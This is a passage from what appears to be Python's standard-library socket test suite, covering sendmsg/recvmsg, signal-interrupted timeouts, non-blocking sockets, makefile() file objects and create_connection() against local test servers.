cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
    @testSecondCmsgTruncInData.client_skip
    def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
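# Each concrete class composes, via multiple inheritance, a message-API
# mixin (the Sendmsg*/Recvmsg* test classes) with a transport base (UDP,
# UDP6, TCP, SCTP or Unix stream); the @requireAttrs and @requireSocket
# decorators skip a whole class when the platform lacks the
# corresponding API or address/protocol family.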
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
    # Base class for interrupted send/receive tests. Installs a
    # SIGALRM handler that raises ZeroDivisionError (so the tests can
    # detect the interruption) and removes it on teardown, along with
    # any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
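        # The handler deliberately raises ZeroDivisionError so the tests
        # can tell that a signal really interrupted the blocking call;
        # since PEP 475, a plain EINTR is retried internally and would
        # never surface to the caller.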
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises ZeroDivisionError,
        # propagated out of the SIGALRM handler, when interrupted by a
        # signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises
        # ZeroDivisionError, propagated out of the SIGALRM handler,
        # when interrupted by a signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
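        # socketpair() uses AF_UNIX where available and falls back to an
        # AF_INET emulation elsewhere (e.g. on Windows).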
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS blocking fails')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
            # handle EWOULDBLOCK/EAGAIN on all socket operations. That's how
# timeouts are enforced.
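            # Sketch of the mapping verified below:
            #   settimeout(None) -> blocking socket,     blocking FD
            #   settimeout(0)    -> non-blocking socket, non-blocking FD
            #   settimeout(t>0)  -> "blocking" socket,   non-blocking FD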
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
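        # settimeout(0) is equivalent to setblocking(False): both leave
        # the socket with a zero timeout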
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
        # Issue #15989: a true value bigger than UINT_MAX must not be
        # truncated to 0 and mistaken for False (non-blocking)
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
        # bpo-7995: when accept() is called on a listening socket with a
        # timeout and the default timeout is None, the resulting socket
        # must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
        # bpo-7995: when accept() is called on a listening socket with a
        # timeout and the default timeout is not None, the resulting
        # socket must inherit the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
        # the client didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
        # the client has sent data: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
            if n is None:
                # write() returned None: the send buffer is full, so the
                # test managed to saturate it
                break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
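    # Note: patching the module-level socket.socket class makes
    # create_connection() (which instantiates socket.socket) pick up
    # MockSocket; the finally block restores the real class.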
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
        # >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
        # [(2, 2, 0, '', ('127.0.0.1', 41230)),
        #  (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except socket.timeout:
pass
except OSError as exc:
if support.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('socket.timeout not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
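        # 2 == socket.AF_INET (the connection to HOST is made over IPv4)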
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
        self.cli = socket.create_connection(
            (HOST, self.port), timeout=30,
            source_address=('127.0.0.1' if sys.platform == "OpenVMS" else '',
                            self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
        self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
        self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
